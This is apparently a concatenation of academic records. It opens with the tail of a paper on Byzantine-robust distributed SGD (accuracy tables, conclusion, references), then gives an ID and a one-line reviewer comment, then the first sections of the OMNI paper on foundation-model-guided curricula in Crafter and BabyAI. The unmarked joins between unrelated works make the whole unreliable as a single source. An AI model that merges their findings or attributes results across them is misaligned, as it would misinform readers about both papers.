83.71% (-2.75%) | 80.94% (+47.83%) | Table 3: The final top-1 test accuracy when there are 3 Byzantine workers under ALIE attack | Method | with KR | with GM | with CM | with CC | |---------------------------------|---------|---------|---------|---------| | ByzSGDm, batch size = 32 × 8 | 38.55% | 63.11% | 33.11% | 72.83% | | ByzSGDnm, batch size = 32 × 8 | 43.47% | 69.45% | 61.28% | 78.50% | | ByzSGDm, batch size = 512 × 8 | 83.42% | 86.95% | 83.25% | 87.46% | | ByzSGDnm, batch size = 512 × 8 | 85.12% | 89.13% | 86.03% | 88.53% | Table 4: The final top-1 test accuracy when there are 3 Byzantine workers under FoE attack | Method | with KR | with GM | with CM | with CC | |---------------------------------|---------|---------|---------|---------| | ByzSGDm, batch size = 32 × 8 | 10.00% | 78.36% | 83.97% | 83.60% | | ByzSGDnm, batch size = 32 × 8 | 10.00% | 88.55% | 84.12% | 88.99% | | ByzSGDm, batch size = 512 × 8 | 10.00% | 84.09% | 79.16% | 86.24% | | ByzSGDnm, batch size = 512 × 8 | 10.00% | 89.12% | 84.65% | 89.32% | Effectiveness of large batch size and momentum normalization. In this paper, we propose to use (i) a relatively large batch size and (ii) the momentum normalization technique. Here, we empirically evaluate the effectiveness of these two improvements. Specifically, we will compare the performance of the following four methods: (a) ByzSGDm with batch size $32 \times 8$ (baseline), (b) ByzSGDnm with batch size $32 \times 8$, (c) ByzSGDm with batch size $512 \times 8$, and (d) ByzSGDnm with batch size $512 \times 8$. The performances of the methods are compared when there are 3 workers under ALIE attack (Baruch et al., 2019) and FoE attack (Xie et al., 2020), respectively. As presented in Table 3 and Table 4, among the four methods, ByzSGDnm with batch size $512 \times 8$ has the best top-1 test accuracy except for the case of using aggregator KR under FoE attack. All the methods fail when using KR under FoE attack mainly because the KR aggregator is not robust against FoE attack, as shown in existing works (Karimireddy et al., 2021; Xie et al., 2020). The empirical results of ByzSGDm and ByzSGDnm with more different batch size are deferred to Appendix E for space saving. In addition, we also compare the performance of ByzSGDm and ByzSGDnm under no attack (or failure) and under bit-flipping failure (Xie et al., 2019), respectively. ByzSGDnm has a comparable performance to ByzSGDm in these two cases. Please refer to Appendix E for the detailed results. More evaluation when NNM is used. We also compare the empirical performance of different methods when the nearest neighbour mixing (NNM) (Alouah et al., 2023) technique is used. NNM is originally proposed to enhance the robustness of aggregators in general non-i.i.d. cases but can Table 5: The final top-1 test accuracy when there are 3 Byzantine workers under ALIE attack and the nearest neighbour mixing (NNM) technique is used | Method | with KR | with GM | with CM | with CC | |---------------------------------------------|---------|---------|---------|---------| | ByzSGDm, batch size = 32 × 8 (baseline) | 58.61% | 72.58% | 71.51% | 76.48% | | ByzSGDnm, batch size = 32 × 8 | 80.41% | 79.50% | 79.81% | 79.91% | | ByzSGDm, batch size = 512 × 8 | 85.26% | 85.37% | 86.95% | 85.98% | | ByzSGDnm, batch size = 512 × 8 | 87.68% | 88.09% | 87.69% | 87.59% | Table 6: The wall-clock time of ByzSGDm and ByzSGDnm for 160 epochs (in second) | Batch size | 32×8 | 64×8 | 128×8 | 256×8 | 512×8 | |------------|--------|--------|--------|--------|--------| | ByzSGDm | 2007.39s | 985.52s | 522.27s | 366.98s | 314.80s | | | (×2.04 faster) | (×3.84 faster) | (×5.47 faster) | (×6.38 faster) | | ByzSGDnm | 1985.78s | 978.50s | 515.46s | 376.70s | 327.62s | | | (×2.03 faster) | (×3.85 faster) | (×5.27 faster) | (×6.06 faster) | also be used in i.i.d. cases. As the results in Table 5 show, ByzSGDnm with batch size 512 × 8 still has the best final top-1 test accuracy under ALIE attacks when NNM is used. In addition, we find it interesting that when combined with NNM, the performance of KR and CM is improved, but the performance of GM and CC is degraded. Since NNM is originally proposed for general non-i.i.d. cases, it requires further study to understand this behavior of NNM in i.i.d. cases. However, since we mainly focus on the effect of batch size, it is beyond the scope of this work. The bonus of training acceleration. Existing works (Goyal et al., 2017; Hoffer et al., 2017; Keskar et al., 2017; You et al., 2020; Zhao et al., 2020, 2023) have shown that increasing batch size can accelerate the training process by reducing the communication cost and utilizing the computing power of GPUs more effectively. We present the wall-clock time for 160 epochs when using CC as the robust aggregator under no attack in Table 6. Please note that whether there are attacks or not has almost no effect on the computation cost of non-Byzantine workers. For both ByzSGDm and ByzSGDnm, the running time decreases as the batch size increases. It verifies that increasing batch size has the bonus of training acceleration. In addition, ByzSGDnm has a comparable running time to ByzSGDm, which shows that the computation cost of the momentum normalization is negligible. Comparison with Byz-VR-MARINA. Byz-VR-MARINA (Gorbunov et al., 2023) is originally proposed for non-i.i.d. cases, but can also be used in i.i.d. cases. Therefore, we also empirically compare ByzSGDnm with Byz-VR-MARINA. Empirical results show that ByzSGDnm significantly outperforms Byz-VR-MARINA in i.i.d. cases. Detailed results are deferred to Appendix D. Although we mainly study the effect of batch size in BRDL for i.i.d. cases in this work, we also provide some empirical results under non-i.i.d. settings in Appendix E.2. The empirical results show that ByzSGDnm still outperforms existing methods in the non-i.i.d. setting. However, further work is required to detailedly discover the effect of batch size and the behavior of ByzSGDnm in non-i.i.d. cases, which we will study in the future. 6 CONCLUSION In this paper, we theoretically show that when the total number of gradient computation is fixed, the optimal batch size corresponding to the tightest theoretical upper bound in BRDL increases with the fraction of Byzantine workers. The theoretical results indicate that a relatively large batch size is preferred when there are Byzantine attacks. Furthermore, we propose a novel method called ByzSGDnm and prove the convergence of ByzSGDnm. Empirical results show that when under Byzantine attacks, setting a relatively large batch size can significantly increase the model accuracy compared to the case of small batch size, which is consistent with our theoretical results. Moreover, ByzSGDnm can achieve higher model accuracy than existing BRDL methods when under attack. In addition, increasing batch size has the bonus of training acceleration, which is verified by the empirical results. REPRODUCIBILITY STATEMENT For the theoretical results of our work, the assumptions are presented in Section 2 and the detailed proofs are deferred to Appendix B. For the empirical results, the experimental platform and the hyper-parameter settings are described in Section 5. The core code for our experiments can be found in the supplementary material. ACKNOWLEDGMENTS This work is supported by National Key R&D Program of China (No. 2020YFA0713900), NSFC Project (No. 12326615, No. 62192783), and Fundamental Research Funds for the Central Universities (No. 020214380108). REFERENCES Dan Alistarh, Demjan Grubic, Jerry Li, Ryota Tomioka, and Milan Vojnovic. QSGD: Communication-efficient SGD via gradient quantization and encoding. In Advances in Neural Information Processing Systems, pp. 1709–1720, 2017. Zeyuan Allen-Zhu, Faeze Ebrahimian, Jerry Li, and Dan Alistarh. Byzantine-resilient non-convex stochastic gradient descent. arXiv preprint arXiv:2012.14368, 2020. Youssef Allouah, Sadegh Farhadkhani, Rachid Guerraoui, Nirupam Gupta, Rafaël Pinot, and John Stephan. Fixing by mixing: A recipe for optimal byzantine ml under heterogeneity. In Proceedings of the International Conference on Artificial Intelligence and Statistics, pp. 1232–1300. PMLR, 2023. Yossi Arjevani, Yair Carmon, John C Duchi, Dylan J Foster, Nathan Srebro, and Blake Woodworth. Lower bounds for non-convex stochastic optimization. Mathematical Programming, 199(1-2):165–214, 2023. Gilad Baruch, Moran Baruch, and Yoav Goldberg. A little is enough: Circumventing defenses for distributed learning. In Advances in Neural Information Processing Systems, pp. 8635–8645, 2019. Jeremy Bernstein, Jiawei Zhao, Kamyar Azizzadenesheli, and Anima Anandkumar. signSGD with majority vote is communication efficient and fault tolerant. In Proceedings of the International Conference on Learning Representations, 2019. Peva Blanchard, Rachid Guerraoui, Julien Stainer, et al. Machine learning with adversaries: Byzantine tolerant gradient descent. In Advances in Neural Information Processing Systems, pp. 119–129, 2017. Saikiran Bulusu, Prashant Khanduri, Swatantra Kafle, Pranay Sharma, and Pramod K Varshney. Byzantine resilient non-convex scsg with distributed batch gradient computations. IEEE Transactions on Signal and Information Processing over Networks, 7:754–766, 2021. Lingjiao Chen, Hongyi Wang, Zachary Charles, and Dimitris Papailiopoulos. Draco: Byzantine-resilient distributed training via redundant gradients. In Proceedings of the International Conference on Machine Learning, pp. 903–912, 2018. Yudong Chen, Lili Su, and Jiaming Xu. Distributed statistical machine learning in adversarial settings: Byzantine gradient descent. Proceedings of the ACM on Measurement and Analysis of Computing Systems, 1(2):1–25, 2017. Ashok Cutkosky and Harsh Mehta. Momentum improves normalized sgd. In Proceedings of the International Conference on Machine Learning, pp. 2260–2268, 2020. Georgios Damaskinos, Rachid Guerraoui, Rhicheek Patra, Mahsa Taziki, et al. Asynchronous Byzantine machine learning (the case of SGD). In Proceedings of the International Conference on Machine Learning, pp. 1145–1154, 2018. Aaron Defazio and Léon Bottou. On the ineffectiveness of variance reduced optimization for deep learning. Advances in Neural Information Processing Systems, 32, 2019.
AgM3MzT99c
This is quite important in a practical open-ended environment. Without considering the survival component, the aspects that need to be considered during choosing the task become less adequate and complex, which goes against the motivation of using LLMs here.
OMNI: Open-endedness via Models of Human Notions of Interestingness Jenny Zhang\textsuperscript{1,2} Joel Lehman\textsuperscript{3} Kenneth Stanley\textsuperscript{4} Jeff Clune\textsuperscript{1,2,5} \textsuperscript{1}Department of Computer Science, University of British Columbia \textsuperscript{2}Vector Institute \textsuperscript{3}Stochastic Labs \textsuperscript{4}Maven \textsuperscript{5}Canada CIFAR AI Chair Abstract Open-ended algorithms aim to learn new, interesting behaviors forever. That requires a vast environment search space, but there are thus infinitely many possible tasks. Even after filtering for tasks the current agent can learn (i.e., learning progress), countless learnable yet uninteresting tasks remain (e.g., minor variations of previously learned tasks). An Achilles Heel of open-endedness research is the inability to quantify (and thus prioritize) tasks that are not just learnable, but also interesting (e.g., worthwhile and novel). We propose solving this problem by Open-endedness via Models of human Notions of Interestingness (OMNI). The insight is that we can utilize foundation models (FMs) as a model of interestingness (MoI), because they already internalize human concepts of interestingness from training on vast amounts of human-generated data, where humans naturally write about what they find interesting or boring. We show that FM-based MoIs improve open-ended learning by focusing on tasks that are both learnable and interesting, outperforming baselines based on uniform task sampling or learning progress alone. This approach has the potential to dramatically advance the ability to intelligently select which tasks to focus on next (i.e., auto-curricula), and could be seen as AI selecting its own next task to learn, facilitating self-improving AI and AI-Generating Algorithms. 1 Introduction Provided that the real, significant challenges of AI safety and existential risk can be solved (Critch & Krueger [2020], Boström [2002], Turchin & Denkenberger [2020], Ecoffet et al. [2020]), there are tremendous gains to be had by creating more powerful AI or even AGI. A great hope for AI is that one day it can produce breakthroughs that fundamentally improve the human condition. These so-far uniquely human advancements and discoveries are the hallmark of civilization, from the invention of the wheel, to farming, vaccines, computers, and even rock and roll. Perhaps someday, AI could achieve such major breakthroughs automatically. What does AI need to possess to discover such new paradigms, as only humans have until now? Much discussed in open-endedness research (Stanley et al. [2023]), the ephemeral fuel behind civilization’s prodigious output is the human intuition for interestingness. Drawing upon eons of human experience, we can sense potential even when we don’t precisely know where it leads. Conventional Reinforcement Learning (RL) tools (e.g., intrinsic motivation (Aubret et al. [2019], Pathak et al. [2017], Osband et al. [2018], Cotas et al. [2022], Oudeyer et al. [2007]) and learning progress (Kanitscheider et al. [2021], Matiisen et al. [2019], Portelas et al. [2020], Graves et al. [2017], Kovač et al. [2022], Baranes & Oudeyer [2013])) are so far only shadows of what such a human sense could do. However, with the rise of foundation models (FMs) (Bommasani et al. [2021]), such as large language models (Radford et al. [2018]), an intriguing prospect has arisen – trained on vast troves of human experience, perhaps FMs have the potential to grapple for the first time with the critical question of what is actually interesting to explore. Open-ended learning algorithms, which could leverage such a notion of interestingness, seek to create AI agents that, like humans, continuously learn a variety of different skills within a vast, complex, \footnotesize{We recommend the version on arXiv (\url{https://arxiv.org/abs/2306.01711}), which is slightly longer and thus able to explain things more clearly and more fully discuss the implications of this work. Project website: \url{https://www.jennyzhangzt.com/omni/}} ever-changing environment. The challenge addressed by interestingness is that, in such environments, there are an infinite number of possible tasks, requiring some method to choose which tasks to try to learn next at every point in training. Handcrafting curricula for training agents in open-ended environments can be extremely challenging due to the sheer number of tasks and the need to adapt to the agent’s skill level and learning progress. In pursuit of an algorithm that is applicable in any domain and enables perpetual learning, handcrafting curricula proves to be an impractical solution. Learning progress methods are a type of auto-curriculum approach that estimates which tasks are at appropriate difficulty levels for the agent to learn from (Kanitscheider et al., 2021; Matiisen et al., 2019; Portelas et al., 2020; Graves et al., 2017; Kovač et al., 2022; Baranes & Oudeyer, 2013). However, such methods can be distracted by learnable yet uninteresting tasks. For example, an agent could be bogged down indefinitely with rearranging silverware in slightly new configurations, hindering it from trying other interesting tasks. Even after filtering for tasks that the current agent can learn, countless learnable yet uninteresting tasks may persist (e.g., slight variations of previously learned tasks). A key challenge in open-endedness research is the inability to quantify and thus focus on tasks that are not only learnable but also interesting. There have been many attempts to quantify interestingness, but, as we detail in Section 2, such simple, hand-crafted formulas consistently fall short of truly capturing the essence of interestingness, creating crippling pathologies. This paper proposes a different path forward. To borrow from Newton, modern AI sees further by standing on the shoulders of giant human datasets. Training on vast amounts of human-generated data has proven powerful in many cases, such as text generation (e.g., GPT-3 (Brown et al., 2020)), image generation (e.g., DALL-E (Ramesh et al., 2021)), and representation learning (e.g., CLIP (Radford et al., 2021)). We propose Open-endedness via Models of human Notions of Interestingness (OMNI). OMNI leverages the power of FMs that have already been trained on extensive human-generated data and have an inherent understanding of human notions of interestingness (Brown et al., 2020; OpenAI, 2023). OMNI utilizes FMs as a model of interestingness (MoI) to focus on tasks that are: (1) learnable, at appropriate difficulty levels for the agents to learn from, and (2) interesting, roughly meaning worthwhile to learn and sufficiently novel. The concepts of “interestingness”, “worthwhile”, and “novelty” are challenging to explicitly define, let alone quantify, which is precisely what OMNI addresses. Humans can intuitively assess these qualities despite their elusive and abstract nature, echoing Justice Potter Stewart’s sentiment of “I know it when I see it” (Stewart, 1964). The goal of OMNI is to emulate this human capacity for nuanced interestingness judgement in open-ended learning. We evaluate OMNI on three challenging domains, Crafter (Hafner, 2021) (a 2D version of Minecraft), BabyAI (Chevalier-Boisvert et al., 2018) (a 2D grid world for grounded language learning), and AI2-THOR (Kolve et al., 2017) (a 3D photo-realistic embodied robotics environment). OMNI outperforms baselines based on uniform task sampling or learning progress alone. Overall, OMNI has the potential to significantly enhance the ability of AI to intelligently select which tasks to concentrate on next for endless learning and marks a step towards self-improving AI and AI-Generating Algorithms (Clune, 2019). 2 RELATED WORK 2.1 AUTO-CURRICULUM LEARNING Training neural networks with a curriculum has been extensively studied (Bengio et al., 2009). Auto-curriculum learning has emerged as a promising research area in RL (Kanitscheider et al., 2021; Matiisen et al., 2019; Portelas et al., 2020; Graves et al., 2017; Kovač et al., 2022; Baranes & Oudeyer, 2013; Lehman & Stanley, 2011a; Eysenbach et al., 2018; Wang et al., 2019, 2020; Akkaya et al., 2019; Florensa et al., 2018; Zhang et al., 2020; Campero et al., 2020; OpenAI et al., 2021; Dennis et al., 2020; Gur et al., 2021; Jiang et al., 2021; Dharna et al., 2022), with approaches based on success probabilities and reward thresholds (Wang et al., 2019, 2020; Akkaya et al., 2019; Campero et al., 2020; Tan et al., 2023), regret (Dennis et al., 2020; Gur et al., 2021; Jiang et al., 2021), or learning progress (Kanitscheider et al., 2021; Matiisen et al., 2019; Portelas et al., 2020; Graves et al., 2017; Kovač et al., 2022; Baranes & Oudeyer, 2013). Static threshold-based approaches provide a straightforward method for curriculum design. These approaches involve setting fixed criteria for tasks based on their difficulty or complexity. An agent progresses to the subsequent task in a predefined order only after mastering a simpler one. To handcraft an effective curriculum, one would have to understand the relative difficulty of each task and identify tasks of suitable difficulty corresponding to each phase of the agent’s learning trajectory. Doing this in a vast task space is extremely difficult or even impossible. Regret-based methods compute per-task regret by taking the difference between the maximum known return and the average return over multiple rollouts. Regret-based methods typically select tasks with high regret, under the assumption that these tasks still offer substantial learning opportunities (Dennis et al., 2020; Gur et al., 2021; Jiang et al., 2021). However, in stochastic environments, this approach may favor more stochastic and less learnable tasks instead of less stochastic and more learnable ones (Kanitscheider et al., 2021). Learning-progress-based curricula have the potential to mitigate these issues by monitoring the agent’s progress and adapting the task selection accordingly (Kanitscheider et al., 2021; Matiisen et al., 2019; Portelas et al., 2020; Graves et al., 2017; Kováč et al., 2022; Baranes & Oudeyer, 2013). Kanitscheider et al. (2021) demonstrated that learning progress can be measured reliably and that learning-progress-based curricula can be applied to hard RL problems at scale. Our work extends the learning-progress-based curriculum proposed by Kanitscheider et al. (2021). A notable limitation of existing auto-curricula approaches is their inability to distinguish between interesting and uninteresting tasks. Despite filtering for learnable tasks, open-ended environments may still contain infinite learnable but uninteresting tasks. This paper proposes a novel method for identifying and filtering interesting tasks and integrates it with a learning-progress-based auto-curriculum. 2.2 Attempts to Quantify Interestingness Many prior research papers have tried to encourage a predefined metric of novelty, diversity, exploration, or open-endedness, but doing so requires quantifying these ineffable qualities. The problem is that optimizing these quantitative measures often leads to undesirable or pathological outcomes, resulting in an output that conforms to the defined metrics, rather than achieving the intended goal (Aubret et al., 2019; Pathak et al., 2017; Osband et al., 2018; Colas et al., 2022; Oudeyer et al., 2007; Etcheverry et al., 2020; Lehman & Stanley, 2011a; Mouret, 2011; Mouret & Clune, 2015; Lehman & Stanley, 2011b; Eysenbach et al., 2018; Bellemare et al., 2016; Ecoffet et al., 2019; Mendonca et al., 2023; Lehman & Stanley, 2012; Lehman et al., 2020; Nguyen et al., 2015; Auerbach & Bongard, 2010; Zhou et al., 2023; Cai et al., 2023). As Goodhart’s law posits, “when a measure becomes a target, it ceases to be a good measure” (Strathern, 1997). For example, an agent might exploit a novelty measure by generating many superficially different but ultimately trivial solutions, thus undermining the goal of discovering genuinely interesting outcomes (Lehman & Stanley, 2011a). Similarly, based on how intrinsic motivation is measured, an agent could be biased towards certain types of solutions, leading to a narrow exploration of the problem space rather than developing diverse and valuable insights and innovations (Aubret et al., 2019). Attempting to manually specify a criteria for what constitutes an interesting learning challenge is unlikely to yield satisfactory results. Instead, this paper proposes harnessing FMs to model ineffable human notions of interestingness, gleaned from large text corpora of existing human-generated data (e.g. training on the Internet). 2.3 Pre-trained Foundation Models in Open-Endedness Large language models have recently shown a remarkable ability to capture rich knowledge on an extensive array of subjects from large-scale text corpora. They achieve impressive performance across a wide range of natural language processing tasks (Brown et al., 2020; OpenAI, 2023; Kenton & Toutanova, 2019; Liu et al., 2019; Min et al., 2021; Li et al., 2022; Colas et al., 2023) and display profound understanding of complex concepts such as physics. Consequently, they are utilized in many robotics domains (Huang et al., 2022b; Ahn et al., 2022; Yang et al., 2023; Lynch & Sermanet, 2020; Sharma et al., 2021; Kant et al., 2022; Kwon et al., 2023; Du et al., 2023; Driess et al., 2023). There has been growing interest in using them for task selection or generation. Some studies have investigated the application of FMs in breaking down high-level instructions into a sequence of sub-goals, which can be executed by an agent in a zero-shot manner (Huang et al., 2022b; Ahn et al., 2022; Yang et al., 2023; Colas et al., 2023; Zhu et al., 2023) or used to train modular sub-policies (Lynch & Sermanet, 2020; Sharma et al., 2021; Kant et al., 2022) queries FMs for zero-shot commonsense priors and apply them to a planning task. Other studies have utilized FMs to estimate success rates for a given task or desired behavior (Kwon et al., 2023; Du et al., 2023; Colas et al., 2023; Wang et al., 2023a,b). Moreover, FMs have been employed to generate or explain tasks, enabling structured exploration in various environments (Du et al., 2023; Colas et al., 2023; Wang et al., 2023a,b; Yuan et al., 2023). OMNI differs from Du et al. (2023) by considering an agent’s past successes and employing FMs’ commonsense knowledge for adaptive task selection. Unlike Wang et al. (2023a), which employs a code API generated by FMs, OMNI promotes direct action learning via environment interaction, demanding potentially higher computational resources but bypassing the need for and, critically, limitations of, domain-specific code APIs. While Colas et al. (2023) use deterministic environments and binary reward signals for trajectory success, OMNI adopts a more nuanced approach in stochastic settings, recognizing that agents often improve over time and may not always achieve consistent success rates. 3 METHODS 3.1 PROBLEM FORMULATION We train task-conditioned agents, and formulate the RL problem as a partially observed Markov decision process (Kaelbling et al., 1998) defined by a tuple \((S, A, T, R, O, \Omega, \gamma)\). Observations \(o \in \Omega\) depend on the new environment states \(s \in S\) and actions taken \(a \in A\) via \(O(o|s, a)\). The task which the agent is conditioned on is part of the environment state \(s\). \(T(s'|s, a)\) describes the dynamics of the environment. \(R(s, a)\) is the environment’s reward function. \(\gamma\) is a discount factor. OMNI focuses on generating learnable and interesting tasks to condition the RL agent on. 3.2 LEARNING PROGRESS CURRICULUM The task pool in open-ended environments can be very large and diverse, making it challenging for an agent to learn effectively through uniform sampling. Most randomly sampled tasks are likely to be impossible (or at least currently too hard for the agent to learn). To automatically identify tasks at the frontier of the agent’s capabilities, we extend the learning-progress-based curriculum (without the dynamic exploration bonus) from Kanitscheider et al. (2021). The curriculum predominantly samples tasks with high learning progress, defined as an agent’s recent change in task success probability. During training, the agent is periodically evaluated, and a recent success probability estimate \(p_{\text{recent}}\) is calculated by applying an exponential moving average (EMA) to the evaluated task success rates. \(p_{\text{recent}}\) is smoothed with a second, identical EMA to obtain a slower-to-change reflection \(p_{\text{gradual}}\) of the success probability. Since tasks with low success probabilities are more likely to be novel and are harder to learn because the agent observes fewer successes, \(p_{\text{recent}}\) and \(p_{\text{gradual}}\) are reweighted to magnify the learning progress in tasks with low success probabilities and reduce the learning progress in tasks with high success probabilities. This reweighting also compensates for the temporal delay caused by the EMA (Figure 4). Bidirectional learning progress, the absolute difference between the reweighted \(p_{\text{recent}}\) and \(p_{\text{gradual}}\), is used to also focus learning on tasks where performance is degrading due to forgetting. Sampling of training tasks is biased towards those that score the highest on this bidirectional learning progress measure. We propose an extension to the approach from Kanitscheider et al. (2021), normalizing the task success rates with the success rates achieved by a random action policy (Appendix A). 3.3 MODELING WHAT HUMANS FIND INTERESTING An LP curriculum can be distracted by endless variations of uninteresting tasks. To address this challenge, a Model of Interestingness (MoI) selects interesting tasks that offer substantial learning value. Humans often intuitively know what might be useful for learning new skills or achieving goals much later (Stanley & Lehman, 2015). This is evident in children playing to unknowingly acquire skills, or scientists exploring new areas to uncover unexpected and beneficial knowledge for future endeavors. This paper presents two (of many possible) instances of the OMNI principle: one in finite task spaces (Section 3.3), and one in an infinite task space (Section 5.1). This section describes OMNI the former, first outlining the process of using an FM to determine which tasks are interesting, and then describing how the interestingness predictions are utilized to obtain task sampling weights. Determining Interesting Tasks. This paper capitalizes on the capabilities of autoregressive FMs to emulate human notions of interestingness. FMs are pretrained on vast and diverse text corpora, enabling them to amass a significant amount of world knowledge. We prompt the FM in a few-shot manner by providing it with examples of choosing which tasks are interesting. It takes into account the agent’s existing proficiency on a given set of tasks and suggests what humans would typically find interesting to learn next. Davinci GPT-3 (Brown et al., 2020) was utilized for the Crafter experiments because it was the state-of-the-art language model available when the experiments were run. GPT-4 (OpenAI, 2023) was used for the BabyAI experiments, which were conducted later. Appendices B and C show the full prompts. Sampling Weights. OMNI aims to improve open-ended learning by focusing on tasks that are both learnable and interesting (Figure 4). The full OMNI algorithm is summarized in Algorithm 1. Task sampling rates are first assigned based on the LP curriculum, with higher rates for tasks with higher learning progress (Section 3.2). Then, an FM-based MoI predicts which tasks are interesting (Appendix I). Boring tasks have their sampling weights reduced by multiplying by 0.001. Finally, task sampling rates are normalized to probabilities that sum to 1. 4 EXPERIMENTS IN A FINITE TASK SPACE Figure 1: Crafter and BabyAI environments. (Left) Agent view in a procedurally generated Crafter world, showing terrain types, resources, and the agent’s inventory. (Middle) The 15 tasks considered interesting for Crafter analyses. Arrows indicate which tasks in the technology tree must be completed, often multiple times, along the way to perform more challenging tasks. (Right) Bird’s-eye view of a randomly generated BabyAI environment, showing different object types, colors, locations, and states. The agent is the red triangle and its view (sometimes occluded) is highlighted in light grey. In this example, the agent starts from the bottom right room, and is tasked to “go to a red ball”. To succeed, the agent must open the green door (sometimes locked) to reach the red ball. 4.1 CRAFTER ENVIRONMENT We evaluate OMNI on Crafter [Hafner, 2021], a 2D version of Minecraft that enables collecting and creating a set of artifacts organized along a technology tree. This means that certain tasks need to be completed, often multiple times, as prerequisites for other more challenging tasks (Figure 1). Agents receive RGB pixel observations (64 x 64 resolution) of a 9 x 9 grid area surrounding their position within a 64 x 64 grid landscape that varies with each episode, offering a complex and engaging testing ground. The agent is provided a target task (represented with a bag-of-words encoding) as part of its observation and rewarded +1 upon successful completion of the conditioned task. We modify the game to focus on gathering and crafting skills by eliminating the survival component. This removes the need for the agent to learn and continually apply survival tactics against enemies or for food gathering. The “sleep” and “place plant” actions are important for survival in the original game and have been omitted due to their reduced relevance in our modified context, which excludes the survival aspect. The original game consists of 22 tasks, of which, the 15 tasks unrelated to survival are selected and considered interesting. To investigate our hypothesis that focusing on interesting tasks with high learning progress will improve performance, we dilute the 15 interesting tasks with 90 “boring” tasks and 1023 “extremely challenging” tasks that serve as potential distractors for learning-progress-based approaches. Boring tasks are generated as numerical repeats of interesting tasks, e.g., “collect N wood” where $N \in [2, 10]$, analogous to how minor numerical variations of real-world tasks are less interesting than tasks that differ qualitatively. See Appendix K for the full list of boring tasks. Extremely challenging tasks represent tasks that are too difficult for the agent to complete at its current state of learning, serving as tasks that uniform sampling will waste time on, but that learning-progress-based methods should successfully ignore. The agent is assumed to always fail at these extremely challenging tasks and hence is always assigned a success rate of 0 for them. By analogy, consider the futility of attempting to cook a 5-course meal before learning the basic skill of cutting a vegetable. 4.2 BABYAI ENVIRONMENT We also evaluate OMNI on BabyAI [Chevalier-Boisvert et al., 2018], a readily available benchmark domain characterized by its partially observable 2D grid world environment (Figure 1). We test on the MiniBossLevel. While BossLevel is the most challenging level in BabyAI, we choose MiniBossLevel as it has the same features as BossLevel but with a smaller room and lower probability of locked rooms, speeding up training. For each episode, the room layout and item configuration are randomly generated (using off-the-shelf configurations from Chevalier-Boisvert et al., 2018). The grid world can have objects in six colors (red, green, blue, purple, yellow, grey), and of four types (key, ball, box, door). The agent is randomly spawned at a location in the 9 x 9 grid world, containing four 3 x 3 rooms. The agent’s observation includes one-hot encodings of each of the 7 x 7 grid cells in front of the agent (observations are set to a special symbol if occluded), and a description of the task in natural language (embedded with a look-up table and GRU, see Appendix M for more details). The agent receives a reward, proportional to the number of steps it took to finish, only when it has successfully completed the given task. While the Baby Language grammar (Chevalier-Boisvert et al., 2018) is limited to sequential tasks with a maximum of 2 instructions, we expanded this by permitting tasks with up to 5 instructions, resulting in 1364 unique tasks. Each task is a sequence of instructions (GoTo, PickUp, OpenDoor, PutNextTo), linked by the ordering constraint then. Object placements are randomized each episode. Tasks with the same sequence of instructions but different object instances are considered the same when sampling (e.g., “go to a blue ball” and “go to a red key” are considered the same task “go to <object>”). 4.3 Results Figure 2: Results in Crafter. (Left) Conditional success probabilities of all tasks in Crafter. Tasks are organized from simple to complex based on the prerequisite tasks that must be accomplished before completing the target task. Task names (left of each row) are readable in a digital format with zoom. (Right) Performance in Crafter on all tasks. While OMNI biases training towards interesting tasks, it achieves higher average task success rates and learns more tasks than uniform sampling or choosing tasks based on learning progress alone, even across all tasks. Both Crafter and BabyAI RL agents are trained with PPO (Schulman et al., 2017), a standard RL algorithm. Policy details and hyperparameters for the Crafter and BabyAI settings are in Appendices L and M. We compare the performance of agents trained with: (1) Uniform sampling, (2) Learning Progress (LP) only, and (3) OMNI: Learning Progress with additional filtering by a Model of Interestingness (OMNI: LP + MoI). Uniform sampling, the control, samples all tasks with equal probabilities. Uniform sampling is the most naive and samples tasks that are too easy or too difficult for the agent most of the time. LP samples tasks based on the calculated learning progress weights (Section 3.2), but is distracted by the many boring tasks. OMNI: LP + MoI focuses on the subset of tasks with high learning progress that are also interesting (Section 3.3). All experiments are run for 100 million time steps and are repeated 10 times with different random seeds. Each experiment takes about 33 hrs for Crafter and 60 hrs for BabyAI on a 24GB NVIDIA A10 GPU with 30 virtual CPUs. We evaluate our methods with two metrics: (1) the average task success rate, and (2) the number of tasks with success rates exceeding a predetermined threshold $\alpha$. This study sets $\alpha = 0.2$, consistent with the selections made in related literature (Kamitscheider et al., 2021; Team et al., 2023). The first metric reflects the agent’s average performance across all tasks, while the second metric captures the extent to which the agent is a generalist that has decent competency on many different tasks. These metrics are calculated on the full task set (Figures 2 and 7). Metrics calculated on interesting tasks only are shown in Appendix O. All confidence intervals given are 95% median bootstrap confidence intervals obtained by resampling 1000 times. Confidence intervals are reported with the following notation: \( \text{stat} (\text{CI}: \text{lower} – \text{upper}) \) where \( \text{stat} \) is the median across runs. Shaded areas in graphs also indicate the 95% median bootstrap confidence interval obtained by resampling 1000 times. **Uniform Sampling.** As expected, the results with uniform sampling are poor. Worse, the agents did not improve over time as most tasks sampled are too difficult or too easy for the agent and successes are extremely sparse (Figures 2 and 7). The agent is considered to have learned a task if its conditional success probability on that task is at least 0.2. In Crafter, the agent learns 4 (CI: 4 – 6) tasks (interesting or boring) and only 3 (CI: 2 – 3) interesting tasks. The agent achieves an average task success rate of 0.030 (CI: 0.026 – 0.033) on interesting and boring tasks, and 0.103 (CI: 0.087 – 0.120) on interesting tasks only. In BabyAI, the agent learns only 1 (CI: 0 – 1) task and achieves an average task success rate of 4.7e-3 (CI: 4.6e-3 – 5.0e-3) on all tasks. **Learning Progress Curriculum.** By focusing on tasks with suitable difficulty, the agent learns to do a lot more tasks with higher success rates than uniform sampling. In Crafter, the agent learns 55 (CI: 54 – 56) tasks (interesting or boring) and 9 (CI: 9 – 11) interesting tasks. The agent achieves an average task success rate of 0.42 (CI: 0.41 – 0.43) on interesting and boring tasks, and 0.52 (CI: 0.50 – 0.56) on interesting tasks only. In BabyAI, the agent learns 4 (CI: 4 – 6) tasks and achieves an average task success rate of 5.9e-3 (CI: 5.5e-3 – 6.2e-3) on all tasks. Across all metrics and in both domains, the differences in performance between LP and Uniform at 25%, 50%, 75%, and 100% of the way through training are statistically significant (all p < 1e-3, Mann Whitney U test), showing that LP significantly outperforms uniform sampling (Figures 2 and 7). LP samples tasks that are at the frontier of the agent’s capabilities (Figures 2, 7, 8, 14). When a task’s conditional success probability changes, LP focuses more on it. Hence, there will be more rollouts where the task is the given goal and thus more positive examples from which the agent can learn to solve the conditioned task. However, LP is distracted by boring tasks (Figures 8 and 14). When the conditional success probabilities of boring tasks change, LP allocates higher sampling weights 